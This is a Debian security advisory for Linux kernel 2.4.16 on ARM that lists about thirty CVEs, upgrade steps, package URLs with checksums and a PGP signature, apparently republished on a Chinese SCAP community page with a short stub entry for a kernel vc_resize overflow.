CVE IDs        : CVE-2004-0427 CVE-2005-0489 CVE-2004-0394 CVE-2004-0447 CVE-2004-0554 CVE-2004-0565 CVE-2004-0685  CVE-2005-0001 CVE-2004-0883 CVE-2004-0949 CVE-2004-1016 CVE-2004-1333 CVE-2004-0997 CVE-2004-1335 CVE-2004-1017 CVE-2005-0124 CVE-2005-0528 CVE-2003-0984 CVE-2004-1070 CVE-2004-1071 CVE-2004-1072 CVE-2004-1073 CVE-2004-1074 CVE-2004-0138 CVE-2004-1068 CVE-2004-1234 CVE-2005-0003 CVE-2004-1235 CVE-2005-0504 CVE-2005-0384 CVE-2005-0135

Several local and remote vulnerabilities have been discovered in the Linux
kernel that may lead to a denial of service or the execution of arbitrary
code. The Common Vulnerabilities and Exposures project identifies the
following problems:


 CVE-2004-0427

     A local denial of service vulnerability in do_fork() has been found.     

 CVE-2005-0489

     A local denial of service vulnerability in proc memory handling has
     been found.

 CVE-2004-0394

     A buffer overflow in the panic handling code has been found.

 CVE-2004-0447

     A local denial of service vulnerability through a null pointer
     dereference in the IA64 process handling code has been found.

 CVE-2004-0554

     A local denial of service vulnerability through an infinite loop in
     the signal handler code has been found.

 CVE-2004-0565

     An information leak in the context switch code has been found on
     the IA64 architecture.

 CVE-2004-0685

     Unsafe use of copy_to_user in USB drivers may disclose sensitive
     information.

 CVE-2005-0001

     A race condition in the i386 page fault handler may allow privilege
     escalation.

 CVE-2004-0883

     Multiple vulnerabilities in the SMB filesystem code may allow denial
     of service of information disclosure.

 CVE-2004-0949

     An information leak discovered in the SMB filesystem code.

 CVE-2004-1016

     A local denial of service vulnerability has been found in the SCM layer.

 CVE-2004-1333

     An integer overflow in the terminal code may allow a local denial of
     service vulnerability.

 CVE-2004-0997

     A local privilege escalation in the MIPS assembly code has been found.
 
 CVE-2004-1335
 
     A memory leak in the ip_options_get() function may lead to denial of
     service.
      
 CVE-2004-1017

     Multiple overflows exist in the io_edgeport driver which might be usable
     as a denial of service attack vector.
 
 CVE-2005-0124

     Bryan Fulton reported a bounds checking bug in the coda_pioctl function
     which may allow local users to execute arbitrary code or trigger a denial
     of service attack.

 CVE-2005-0528

     A local privilege escalation in the mremap function has been found

 CVE-2003-0984

     Inproper initialization of the RTC may disclose information.

 CVE-2004-1070

     Insufficient input sanitising in the load_elf_binary() function may
     lead to privilege escalation.

 CVE-2004-1071

     Incorrect error handling in the binfmt_elf loader may lead to privilege
     escalation.

 CVE-2004-1072

     A buffer overflow in the binfmt_elf loader may lead to privilege
     escalation or denial of service.

 CVE-2004-1073

     The open_exec function may disclose information.

 CVE-2004-1074

     The binfmt code is vulnerable to denial of service through malformed
     a.out binaries.

 CVE-2004-0138

     A denial of service vulnerability in the ELF loader has been found.

 CVE-2004-1068

     A programming error in the unix_dgram_recvmsg() function may lead to
     privilege escalation.

 CVE-2004-1234

     The ELF loader is vulnerable to denial of service through malformed
     binaries.

 CVE-2005-0003

     Crafted ELF binaries may lead to privilege escalation, due to 
     insufficient checking of overlapping memory regions.

 CVE-2004-1235

     A race condition in the load_elf_library() and binfmt_aout() functions
     may allow privilege escalation.

 CVE-2005-0504

     An integer overflow in the Moxa driver may lead to privilege escalation.

 CVE-2005-0384

     A remote denial of service vulnerability has been found in the PPP
     driver.

 CVE-2005-0135

     An IA64 specific local denial of service vulnerability has been found
     in the unw_unwind_to_user() function.

The following matrix explains which kernel version for which architecture
fix the problems mentioned above:

                                     Debian 3.0 (woody)
     Source                          2.4.16-1woody2
     arm/lart                        20040419woody1
     arm/netwinder                   20040419woody1
     arm/riscpc                      20040419woody1

We recommend that you upgrade your kernel package immediately and reboot
the machine.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get dist-upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-lart/kernel-image-2.4.16-lart_20040419woody1.dsc
      Size/MD5 checksum:      655 cbaba3ab1ea1f99557d717bb19908dc8
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-lart/kernel-image-2.4.16-lart_20040419woody1.tar.gz
      Size/MD5 checksum:    16628 c10d76a01d03e58049b594270d7fd7c5
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-image-2.4.16-netwinder_20040419woody1.dsc
      Size/MD5 checksum:      693 be25ede481365d969f465a0356bfe047
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-image-2.4.16-netwinder_20040419woody1.tar.gz
      Size/MD5 checksum:    21947 12d6a2977ba7683e48e92293e4a87cf6
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-riscpc/kernel-image-2.4.16-riscpc_20040419woody1.dsc
      Size/MD5 checksum:      661 6895c73dc50b56d48588e3f053fbcc05
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-riscpc/kernel-image-2.4.16-riscpc_20040419woody1.tar.gz
      Size/MD5 checksum:    19300 3e60e7aa88e553221264f1b004d9091d
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16-1woody3.dsc
      Size/MD5 checksum:      680 81e8e543d617f8464a222767e18aa261
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16-1woody3.diff.gz
      Size/MD5 checksum:    46430 d164de27560966cb695141de9b004e7e
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16.orig.tar.gz
      Size/MD5 checksum: 29364642 8e42e72848dc5098b6433d66d5cacffc

  ARM architecture:

    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-lart/kernel-image-2.4.16-lart_20040419woody1_arm.deb
      Size/MD5 checksum:   718814 87806c13fa914865ecc00f784c64a8f4
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-headers-2.4.16_20040419woody1_arm.deb
      Size/MD5 checksum:  3437272 3061b1a8212d2538bdbffa9609300322
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-image-2.4.16-netwinder_20040419woody1_arm.deb
      Size/MD5 checksum:  6675192 b588a74f3b53c06ef3ffb26218c6e191
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-riscpc/kernel-image-2.4.16-riscpc_20040419woody1_arm.deb
      Size/MD5 checksum:  2914360 3df4986a2bfa64ddea35cb2b76d390a5

  Architecture independent components:

    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-doc-2.4.16_2.4.16-1woody3_all.deb
      Size/MD5 checksum:  1718004 b458e950b6aabb99a781f507c2015dd3
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16-1woody3_all.deb
      Size/MD5 checksum: 23820868 3001c4af6222fa22ecba3053a146e248

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEbtDmXm3vHE4uyloRAhZsAJ0Uw7DM7RtiBSmWWskg8FXq0do5TACeMk43
Y8lxItKTeEpmOE/9asuJ6UU=
=fM5d
-----END PGP SIGNATURE-----

    

- 漏洞信息

12479
Linux Kernel vc_resize() Function Local Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-12-15 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站